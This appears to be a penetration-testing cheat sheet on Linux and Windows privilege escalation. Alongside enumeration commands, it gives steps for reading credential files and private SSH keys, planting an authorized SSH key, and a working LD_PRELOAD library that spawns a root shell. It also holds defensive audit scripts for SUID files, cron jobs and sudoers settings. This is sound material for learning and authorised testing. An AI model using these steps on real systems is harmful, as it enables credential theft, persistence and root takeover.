# Privilege Escalation

## Enumeration Scripts

* [LinEnum](https://github.com/rebootuser/LinEnum.git)
* [Linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)
* [Seatbelt](https://github.com/GhostPack/Seatbelt)
* [JAWS](https://github.com/411Hall/JAWS)
* [PEASS-ng](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

## Techniques

### Kernel Exploits

Identify the exact kernel version and distribution build, then search for publicly known exploits that affect it.

### Vulnerable Software

{% tabs %}
{% tab title="List packages (Linux)" %}

```bash
dpkg -l
```

{% endtab %}

{% tab title="List installed software (Windows)" %}

```powershell
# quote the path: the space would otherwise be read as a second argument
dir "C:\Program Files"
dir "C:\Program Files (x86)"
```

{% endtab %}
{% endtabs %}

### User Privileges

{% tabs %}
{% tab title="Sudo" %}

```bash
sudo -l
```

{% endtab %}

{% tab title="SUID" %}

```bash
find / -perm /4000 2>/dev/null
```

{% endtab %}

{% tab title="SGID" %}

```bash
find / -perm /2000 2>/dev/null
```

{% endtab %}

{% tab title="SUID / SGID" %}

```bash
find / -perm /6000 2>/dev/null
```

{% endtab %}

{% tab title="Windows Token Privileges" %}

```powershell
whoami /priv
```

```powershell
whoami /all
```

{% endtab %}
{% endtabs %}
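
The SUID/SGID `find` commands above only help if you know what is supposed to carry those bits. The script below is an added example, not part of the original page: it records a baseline of set-uid/set-gid regular files and reports anything that later deviates from it, so a newly appeared privileged binary stands out. It assumes Linux with GNU `find` and `stat`; the scan root and the baseline path are arguments chosen by the caller.

```bash
#!/usr/bin/env bash
# Added example, not part of the original page: baseline and audit of
# set-uid / set-gid files. Assumes Linux with GNU find and stat; the scan
# root and baseline path are illustrative arguments supplied by the caller.

# List every set-uid or set-gid regular file under $1 as
# "<octal mode> <owner> <group> <path>", sorted so the output can be compared.
list_setid() {
    local root="$1"
    find "$root" -xdev -type f -perm /6000 -exec stat -c '%04a %U %G %n' {} + 2>/dev/null \
        | LC_ALL=C sort
}

# Compare the current listing against a baseline written earlier by list_setid.
# Prints every entry that is new or whose mode/owner/group changed; returns 0
# when the system still matches the baseline and 1 when it does not.
audit_setid() {
    local root="$1" baseline="$2" current diff
    current="$(mktemp)"
    list_setid "$root" > "$current"
    # comm -13: lines present in the current listing but absent from the baseline
    diff="$(LC_ALL=C comm -13 "$baseline" "$current")"
    rm -f "$current"
    if [ -n "$diff" ]; then
        printf '%s\n' "$diff" | sed 's/^/UNEXPECTED SETID: /'
        return 1
    fi
    return 0
}

# Typical use (as root, so every directory is readable):
#   list_setid /  > /var/lib/setid.baseline    # once, on a known-good system
#   audit_setid / /var/lib/setid.baseline      # from cron or a compliance job
```

Record the baseline once the system is in a known-good state and run the audit from a scheduled job; a non-zero exit status flags a change worth investigating, and a removed or re-permissioned entry shows up the same way because the full mode/owner line is compared.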

### Scheduled Tasks

{% tabs %}
{% tab title="Crontab directories" %}

```bash
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root
```

{% endtab %}

{% tab title="List crontab" %}

```bash
crontab -l
```

{% endtab %}

{% tab title="Edit a crontab" %}

```bash
crontab -e
```

{% endtab %}
{% endtabs %}
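
Listing the cron files is the first step; what matters is whether any job run by root points at a file somebody else can edit. The following is an added example, not code from the original page: it parses system-crontab-style files (the `/etc/crontab` and `/etc/cron.d` format with a user field after the five time fields or an `@special`) and flags every referenced program or script that is group- or world-writable. It assumes Linux with GNU `stat`; the crontab file to inspect is passed as an argument.

```bash
#!/usr/bin/env bash
# Added example, not part of the original page: find cron jobs whose program
# or script can be modified by users other than the owner. Assumes Linux with
# GNU stat; the crontab file path is an argument supplied by the caller.

# For each job, examine every absolute path in the command (interpreter,
# script, arguments) that is an existing regular file and print
# "WRITABLE <mode> <owner> <path>" when group or others can write to it.
cron_writable_targets() {
    local file="$1" line tok mode owner
    while IFS= read -r line || [ -n "$line" ]; do
        line="${line#"${line%%[![:space:]]*}"}"   # strip leading whitespace
        case "$line" in
            ''|'#'*) continue ;;                   # blank line or comment
            [A-Za-z_]*=*) continue ;;              # SHELL=, PATH=, MAILTO= ...
        esac
        set -f                                     # no globbing: time fields contain '*'
        set -- $line
        set +f
        if [ "${1#@}" != "$1" ]; then              # @reboot, @daily, ...: one time field
            [ $# -ge 3 ] || continue
            shift 2                                # drop special + user
        else
            [ $# -ge 7 ] || continue
            shift 6                                # drop five time fields + user
        fi
        for tok in "$@"; do
            case "$tok" in /*) ;; *) continue ;; esac
            [ -f "$tok" ] || continue              # skip /dev/null, redirections, options
            mode="$(stat -L -c '%a' "$tok")"       # -L: look at the target of symlinks
            owner="$(stat -L -c '%U' "$tok")"
            # 0022 (decimal 18) = group-write | other-write
            if [ $(( 0$mode & 18 )) -ne 0 ]; then
                printf 'WRITABLE %s %s %s\n' "$mode" "$owner" "$tok"
            fi
        done
    done < "$file"
}

# Typical use:
#   for f in /etc/crontab /etc/cron.d/*; do cron_writable_targets "$f"; done
```

The check deliberately looks at every absolute path in the command rather than only the first token, so `/bin/sh /opt/backup.sh` is judged by `/opt/backup.sh` as well as by the interpreter; per-user crontabs under `/var/spool/cron/crontabs` have no user field and would need `shift 5` instead of `shift 6`.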

### Exposed Credentials

{% tabs %}
{% tab title="History" %}

```bash
cat ~/.bash_history
```

{% endtab %}

{% tab title="Configuration files" %}

```bash
cat /var/www/html/config.php
```

{% endtab %}
{% endtabs %}

### SSH Keys

{% tabs %}
{% tab title="Get private SSH Key" %}

```bash
cat /home/qu35t/.ssh/id_rsa
```

{% endtab %}

{% tab title="Generate SSH Key" %}

```bash
ssh-keygen -t ed25519 -f qu35t
```

{% endtab %}

{% tab title="Add an authorised key" %}

```bash
# append (>>) so existing keys survive; without -n each key ends on its own line
echo 'PUBLIC SSH KEY' >> /home/qu35t/.ssh/authorized_keys
```

```bash
chmod 600 /home/qu35t/.ssh/authorized_keys
```

{% endtab %}

{% tab title="SSH with private SSH key" %}

```bash
ssh -i qu35t qu35t@10.10.10.10
```

{% endtab %}
{% endtabs %}

### LD\_PRELOAD

{% tabs %}
{% tab title="Program" %}

```c
#define _GNU_SOURCE          /* setresuid() is a GNU extension */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Runs when the library is loaded; it replaces the default _init,
   which is why the library is built with -nostartfiles. */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload into the spawned shell */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

{% endtab %}

{% tab title="Compile" %}

```bash
gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.c
```

{% endtab %}

{% tab title="Load the library" %}

```bash
# only effective when sudoers keeps the variable for this rule (e.g. env_keep += LD_PRELOAD); sudo -l shows it
sudo LD_PRELOAD=/dev/shm/load.so /opt/script.sh
```

{% endtab %}
{% endtabs %}
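
`sudo` discards `LD_PRELOAD` and `LD_LIBRARY_PATH` by default (`env_reset`), so the preload step above only succeeds when sudoers explicitly keeps them or lets the caller set variables. The check below is an added example, not part of the original page: it scans a sudoers file, or saved `sudo -l` output, which prints the same `Defaults` entries, for exactly those directives. It assumes GNU `grep`; the file path is an argument supplied by the caller.

```bash
#!/usr/bin/env bash
# Added example, not part of the original page: report sudoers settings that
# let a caller's dynamic-loader environment reach a command run as root.
# Assumes GNU grep; the file to inspect is an argument supplied by the caller.

# Matches (a) env_keep / env_check entries that carry LD_PRELOAD or
# LD_LIBRARY_PATH, (b) env_reset switched off, (c) the setenv option or a
# SETENV: tag on a command rule, which lets the caller pass any variable.
SUDO_ENV_RISK_RE='(env_keep|env_check)[[:space:]]*\+?=.*LD_(PRELOAD|LIBRARY_PATH)|!env_reset|(^|[[:space:],])setenv([[:space:],]|$)|SETENV:'

# Print matching, uncommented lines as "<lineno>:<line>";
# return 0 when nothing matches and 1 when at least one directive is found.
sudo_env_risks() {
    local file="$1" hits
    hits="$(grep -nE "$SUDO_ENV_RISK_RE" "$file" | grep -vE '^[0-9]+:[[:space:]]*#' || true)"
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Typical use (as root, since sudoers is mode 0440):
#   sudo_env_risks /etc/sudoers
#   for f in /etc/sudoers.d/*; do sudo_env_risks "$f"; done
```

A hit is not automatically a vulnerability: `SETENV:` on a rule that runs a static binary is harmless, while `env_keep += LD_PRELOAD` on a rule that runs a shell script, as in the example above, is the condition that makes the preload work and should be removed or scoped to a rule that does not need it.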

## Windows

{% tabs %}
{% tab title="Unattended Windows Installations" %}

```powershell
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

{% endtab %}

{% tab title="PowerShell History" %}

```powershell
$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

{% endtab %}

{% tab title="Saved Windows Credentials" %}

```powershell
cmdkey /list
```

```powershell
runas /savecred /user:admin cmd.exe
```

{% endtab %}

{% tab title="IIS Configuration" %}

```powershell
C:\inetpub\wwwroot\web.config
```

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

{% endtab %}
{% endtabs %}

{% tabs %}
{% tab title="Scheduled Tasks" %}

```powershell
schtasks /query /tn vulntask /fo list /v
```

```powershell
icacls c:\tasks\schtask.bat
```

{% endtab %}

{% tab title="List Services" %}

```
HKLM\SYSTEM\CurrentControlSet\Services\
```

```powershell
sc qc apphostsvc
```

{% endtab %}
{% endtabs %}

## References

* [GTFOBins](https://gtfobins.github.io/)
* [LOLBAS](https://lolbas-project.github.io/#)

